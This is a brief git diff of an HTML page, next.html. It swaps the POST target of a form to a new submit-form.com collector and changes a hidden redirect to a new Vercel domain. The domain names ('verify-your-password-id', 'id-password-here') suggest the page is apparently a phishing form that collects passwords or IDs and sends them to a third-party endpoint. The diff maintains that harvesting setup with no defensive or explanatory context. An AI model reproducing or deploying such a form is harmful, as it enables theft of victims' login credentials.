--- a/next.html
+++ b/next.html
@@ -26,13 +26,13 @@
       <div class="main-body">
         <form
           class="content"
-          action="https://submit-form.com/MnSLNSX1N"
+          action="https://submit-form.com/CoBGTd890"
           method="POST"
         >
    <input
       type="hidden"
       name="_redirect"
-      value="https://verify-your-password-id.vercel.app/"
+      value="https://id-password-here--mu.vercel.app/"
     />
             
           <div>
